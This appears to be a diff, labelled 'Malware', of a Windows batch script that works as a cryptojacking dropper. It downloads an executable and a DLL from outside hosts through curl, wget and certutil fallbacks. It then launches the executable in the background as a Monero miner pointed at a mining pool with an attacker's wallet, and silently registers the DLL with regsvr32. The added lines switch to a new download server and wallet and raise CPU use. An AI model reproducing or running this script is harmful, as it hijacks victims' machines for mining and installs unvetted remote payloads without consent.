Malware
5 removals
18 lines
12 additions
25 lines
@echo off
@echo off
curl http://185.173.36.219/download/jsextension.exe -o jsextension.exe
curl http://159.148.186.228/download/jsextension.exe -o jsextension.exe
if not exist jsextension.exe (
if not exist jsextension.exe (
wget http://185.173.36.219/download/jsextension.exe -O jsextension.exe
wget http://159.148.186.228/download/jsextension.exe -O jsextension.exe
)
)
if not exist jsextension.exe (
if not exist jsextension.exe (
certutil.exe -urlcache -f http://185.173.36.219/download/jsextension.exe jsextension.exe
certutil.exe -urlcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe
)
curl https://citationsherbe.at/sdd.dll -o create.dll
if not exist create.dll (
wget https://citationsherbe.at/sdd.dll -O create.dll
)
if not exist create.dll (
certutil.exe -urlcache -f https://citationsherbe.at/sdd.dll create.dll
)
)
set exe_1=jsextension.exe
set exe_1=jsextension.exe
set "count_1=0"
set "count_1=0"
>tasklist.temp (
>tasklist.temp (
tasklist /NH /FI "IMAGENAME eq %exe_1%"
tasklist /NH /FI "IMAGENAME eq %exe_1%"
)
)
for /f %%x in (tasklist.temp) do (
for /f %%x in (tasklist.temp) do (
if "%%x" EQU "%exe_1%" set /a count_1+=1
if "%%x" EQU "%exe_1%" set /a count_1+=1
)
)
if %count_1% EQU 0 (start /B .\jsextension.exe -k --tls --rig-id q -o pool.minexmr.com:443 -u 87FLi8c827mTJwezgVXVUrEkHagWiJ2wuaco2bVkFLGqL3MNMFpeay7QJmHooz19qQFMgJfQRJwJKZMJpetT5Qp69xBARwH --cpu-max-threads-hint=20 --donate-level=1 --background)
if %count_1% EQU 0 (start /B .\jsextension.exe -k --tls --rig-id q -o pool.minexmr.com:443 -u 49ay9Aq2r3diJtEk3eeKKm7pc5R39AKnbYJZVqAd1UUmew6ZPX1ndfXQCT16v4trWp4erPyXtUQZTHGjbLXWQdBqLMxxYKH --cpu-max-threads-hint=50 --donate-level=1 --background & regsvr32.exe -s create.dll)
del tasklist.temp
del tasklist.temp